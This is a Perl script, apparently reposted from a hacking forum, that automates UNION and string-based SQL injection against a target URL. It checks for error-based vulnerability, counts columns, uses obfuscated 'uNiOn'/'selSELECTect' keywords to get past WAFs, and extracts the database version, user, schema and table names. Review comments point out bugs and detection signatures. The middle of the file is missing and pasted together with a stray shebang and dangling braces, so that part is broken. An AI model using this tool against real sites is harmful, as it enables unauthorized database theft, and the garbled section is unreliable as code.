
[Source] STRING & UNION Based SQL Injection tool [PERL]


#!usr/bin/perl
# NOTE(review): the shebang lacks its leading slash; as written the script only
# runs when invoked explicitly through the `perl` binary.

# Automated SQL Injection tool by Red_Hat

# Version: 2.0

# Injection Method:UNION Based & STRING based

# Prefix/suffix wrapped around every injected payload.  Both stay empty in
# UNION mode; the "Check attack Method" section further down sets them to
# "'" and "+" when STRING mode is selected.
$starts="";

$ends="";

# NOTE(review): no `use strict; use warnings;` -- every variable in this file
# is an unchecked package global, and a failed request (get()/head() returning
# undef) is never told apart from an empty or non-matching page.
use LWP::Simple;

print q{

____ _ __

/ _/___ (_)__ __/ /__ __

/ // __ \ / / _ \/ ___/ __/ __ \/ ___/

_/ // / / __/ /__/ /_/ /_/ / /

/___/_/ /_/_/ /\___/\___/\__/\____/_/

/___/

Automated SQL Injection tool by Red_Hat

};

# Exactly one argument, the target URL, is expected in $ARGV[0].
if (!defined($ARGV[0])){

print q{

Usage : ./injector.pl http://site.com/page.php?id=1

};

exit;

}

$site=$ARGV[0];

# Check URL.
# This is only an unanchored substring test for "http:"; it does not verify
# that the argument is a well-formed URL.

if ($site!~ m /http:/){

print "[!]Invalid URL.\n";

exit;

}

# URL valid.

# Check if site exists.

# HEAD request to the supplied URL; any false result (network error, non-2xx)
# is reported as "does not exist".
print "[+]Checking if '".$site."' exists...\n";

if (!head($site)){

print "[!]Site does not exist.\n";

exit;

}

# Site Exists

# Check URL Vulnerability

print "[+]Checking vulnerability of '".$site."'...\n";

$url=$site;

# Rewrite the first "=" so the first query-parameter value becomes "2'" --
# a single-quote error probe.
$url=~ s/=/=2'/;

#Check URL.
# If nothing changed, the argument had no "=" (no query parameter) and cannot
# be used.

if ($url eq $site){

print "[!]Invalid URL.\n";

exit;

}

# URL Valid.

# Pentest URL.

$pentest=get($url);

# NOTE(review): $normal is fetched but never read anywhere in the visible
# listing -- one wasted request.
$normal=get($site);

# The decision is pure substring matching on the response body.  The "()" in
# "sql_fetch_array()" is an empty group in the regex, so it matches the bare
# function name.
if ($pentest=~ m /SQL/ or $pentest=~ m /sql_fetch_array()/ or $pentest=~ m /Warning/ or $pentest=~ m /Error:/){

print "[*]Site is vulnerable.\n";

}

else{

# Second attempt: a single quote appended to the whole URL instead of to the
# first parameter value.
$retry=get($site."'");

if ($retry=~ m /SQL/){

print "[*]Site is vulnerable.\n";

}

else{

print "[!]Site is not vulnerable.\n";

exit;

}

}

# URL Vulnerable.

# Check attack Method

# Sends "+order+by+red_hat--": "red_hat" is a deliberately nonexistent column
# name, and that literal in a query string is a usable log-search fingerprint
# for this tool.
print "[+]Checking attack method...\n";

$string=get($site."+order+by+red_hat--");

# An error mentioning "column"/"mysql_num_rows"/"Warning"/"SQL" is taken to
# mean the bare ORDER BY was parsed (UNION mode); anything else selects
# STRING mode, which wraps payloads in the quote prefix/suffix set below.
if ($string=~ m /column/ or $string=~ m /mysql_num_rows()/ or $string=~ m /Warning/ or $string=~ m/SQL/){

print "[+]Starting UNION based attack...\n";

}

else{

print "[+]Starting STRING based attack...\n";

$starts="'";

$ends="+";

}

# Method clear.

# Column count.

print "[+]Starting column count on '".$site."'...\n";

$column=1;

# NOTE(review): this first probe has a leading space before "+order+by+" that
# the probes inside the loop do not, so the first request differs from the rest.
$pentest=get($site.$starts." +order+by+".$column."--".$ends);

# Increase the ORDER BY index until the response contains "column".  One
# request per iteration and no upper bound on $column: if responses never
# match (for example get() keeps returning undef) this loop never ends.
while ($pentest!~ m /column/){

$column++;

$pentest=get($site.$starts."+order+by+".$column."--".$ends);

# Early exit on a warning; `last` is the idiomatic way to leave the loop,
# goto-to-label is flagged by perlcritic.
if ($pentest=~ m /Warning/ or $pentest=~ m /mysql_num_rows()/){

goto endwhileforcolumn;

}

}

endwhileforcolumn:

# Both exit paths decrement: $column becomes the last index that did not
# produce a matching error.
$column=$column-1;

if ($column==0){

print "[!]Could not extract number of columns ...\n";

exit;

}

print "[*]Number of columns : ".$column."...\n";

# End count.

# Extract vulnerable columns

$union=1;

# 0x6c6f6c is the hex encoding of "lol"; it brackets each column index so the
# reflected index can be located with split(/lol/) below.
$query="+and+0+union+select+concat(0x6c6f6c,1,0x6c6f6c)";

print "[+]Extracting vulnerable columns...\n";

# One concat(marker,i,marker) term per column, i = 1..$column.
while ($column > $union){

$union++;

$query=$query.",concat(0x6c6f6c,$union,0x6c6f6c)";

}

$query=$query."--";

$url=$site;

# Replaces the first "=" with "=-", i.e. prefixes the first parameter value
# with a minus sign.
$url=~ s/=/=-/;

$pentest=get($url.$starts.$query.$ends);

# $get[1] is the text between the first two "lol" markers in the response,
# i.e. the index of the first column that is echoed back into the page.
@get=split(/lol/,$pentest);

# The surrounding "" are no-ops; $open is still $get[1] (undef when no marker
# was found, which silently becomes 0 in the arithmetic below because
# warnings are off).
$open="".$get[1]."";

# Treats anything that is not a number of at least 2 as "no usable marker".
if ($open-1 < 1){

if ($pentest=~ /The used SELECT statements have a different number of columns/){

print "[!]Error : The used SELECT statements have a different number of columns...\n";

exit;

}

print "[!]Could not extract vulnerable column...\n";

print "[+]Attempting to bypass WAF...\n";

# `&name;` passes the caller's current @_ through; method() takes no
# arguments so it is harmless here, but `method()` is the conventional call.
# method() communicates its result by writing the global $open.
&method;

if ($open-1 < 1){

print "[!]Could not bypass WAF and extract vulnerable columns...\n";

exit;

}

}

print "[*]Injecting through column : ".$open."...\n";

# Columns extracted.

# Generated counting string

# Build "1,2,...,N" with the literal token OPEN at position $open; each
# extraction below substitutes OPEN with its own group_concat() expression.
$union=1;

$count="1";

while ($union < $column){

$union++;

if ($union==$open){

$count=$count.",OPEN";

}

else{

$count=$count.",".$union."";

}

}

# Counting string generated.

# Extract version

print "[+]Extracting database version...\n";

# Mixed-case keywords ("uNiOn", "SelECt"): a case-sensitive match on
# "union select" will miss these requests; detection rules need /i.
$query=$url.$starts."+uNiOn+SelECt+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,version(),0x6c6f6c)/;

$pentest=get($query);

# As before: $get[1] is whatever sits between the first pair of "lol" markers.
@get=split(/lol/,$pentest);

$version=$get[1];

print "[*]Database version extracted : ".$version."...\n";

# Version extracted.

# Make sure version is high enough
# Aborts when a marker is directly followed by "4" and any one character,
# i.e. an extracted version string beginning with "4.".

if ($pentest=~ m/lol4./){

print "[!]MySQL version is too low for a UNION based injection...\n";

exit;

}

# Version is high enough.

# Extract user

print "[+]Extracting database user...\n";

$query=$url.$starts."+uNioN+select+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,user(),0x6c6f6c)/;

$pentest=get($query);

@get=split(/lol/,$pentest);

$user=$get[1];

print "[*]Database user extracted : ".$user."...\n";

# Database user extracted.

# Extract current database

print "[+]Extracting current database...\n";

$query=$url.$starts."+UnIoN+select+".$count."--".$ends;

$query=~ s/OPEN/group_concat(0x6c6f6c,database(),0x6c6f6c)/;

$pentest=get($query);

@get=split(/lol/,$pentest);

$database=$get[1];

print "[*]Database extracted : ".$database."...\n";

# Current database extracted.

# Extract tables

print "[+]Extracting tables ...\n";

# Table names come from information_schema.tables for the current schema; the
# FROM/WHERE clause is appended outside the OPEN substitution.
$query=$url.$starts."+uNiOn+select+".$count."+FROM+information_schema.tables+WHERE+table_schema=database()--".$ends;

$query=~ s/OPEN/(concat(0x6c6f6c,group_concat(table_name),0x6c6f6c))/;

$pentest=get($query);

# $get[1] holds the comma-separated table names between the markers.
@get=split(/lol/,$pentest);

# NOTE(review): the listing is truncated here.  Everything between the
# table-name split above and this line (the loops that assign $table_name,
# $col and $datapart, and whatever "@moREdata" was part of) is missing from
# this capture, so the remainder cannot be parsed or reviewed as a unit.
@moREdata){

#!/usr/local/bin/perl
# (a second shebang mid-file -- a paste artifact, not code)

# NOTE(review): the mode string is single-quoted, so $site is NOT interpolated
# and the output file is literally named "$site.txt"; the double-quoted message
# below reports a different name.  Had it interpolated, the "/" characters in
# a URL would be treated as path separators.  This is also two-argument `open`
# on a bareword handle with no error check.
open (DUMP, '>>$site.txt');

print DUMP $table_name.">".$col.">".$datapart.">"."'".$_."'\n";

close(DUMP);

}

}

}

}
# The four closing braces above belong to blocks whose opening lines are
# outside the visible text.

print "[*]Database dumped in '$site.txt'\n";

exit;

# Dumped!

# method() -- fallback used when the plain UNION probe above found no
# reflected column.  Takes no arguments and returns nothing; it works entirely
# through package globals: reads $column, $url, $starts and $ends, writes
# $union, $count, $change, $query, $pentest and, on success, $open.
# NOTE(review): the name "method" reads like an OO method; a descriptive name
# and explicit parameters would make the data flow visible.
sub method {

# Generated counting string
# Rebuilds "1,2,...,N" (no OPEN token this time).

$union=1;

$count="1";

while ($union < $column){

$union++;

$count=$count.",".$union."";

}

$change=0;

# Try each column position in turn: replace "<n>," with a marker-bearing
# group_concat() and look for the marker in the response.
while ($column > $change){

$change++;

$query=$count;

# $change is interpolated into the pattern unescaped; it is always an integer
# here, so no regex metacharacters can get in.
$query=~ s/$change,/group_concat(0x6c6f6c),/;

# Keyword obfuscation ("uniUNIONon", "selSELECTect" split by /**/ comments).
# Those two literal strings in a request URI are a high-confidence detection
# signature for this tool.
$pentest=get($url."$starts+/**/uniUNIONon/*+dIstInct+*/selSELECTect/**/+".$query."--".$ends);

# Marker reflected: record the column and stop at the first hit.
if ($pentest=~ m/lol/){

$open=$change;

return;

}

}

# Counting string generated.
# (The comment above is misplaced: nothing is generated here.  Falling out of
# the loop leaves $open unchanged, so the caller's re-check reports failure.)

}

Source : http://www.hackforums.net/showthread.php?tid=3003669
